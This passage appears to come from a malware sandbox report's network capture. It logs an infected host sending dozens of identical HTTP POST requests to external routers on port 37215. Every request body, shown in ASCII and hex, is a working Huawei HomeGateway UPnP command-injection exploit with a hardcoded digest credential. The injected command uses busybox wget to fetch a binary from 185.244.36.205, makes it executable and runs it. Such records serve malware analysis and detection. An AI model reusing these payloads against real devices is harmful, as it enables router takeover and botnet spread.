                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              187192.168.2.154254831.126.36.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038407087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              188192.168.2.1554782190.59.89.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038419008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              189192.168.2.1535178181.161.196.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038481951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              190192.168.2.1560256157.137.69.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038481951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              191192.168.2.1532850222.198.48.24137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038485050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              192192.168.2.1542776121.225.203.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038544893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              193192.168.2.1545096102.204.49.11337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038544893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              194192.168.2.1540586122.146.178.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038590908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              195192.168.2.1537996222.132.104.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038595915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              196192.168.2.1558220102.102.187.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038597107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              197192.168.2.1540880190.220.115.9637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.038685083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
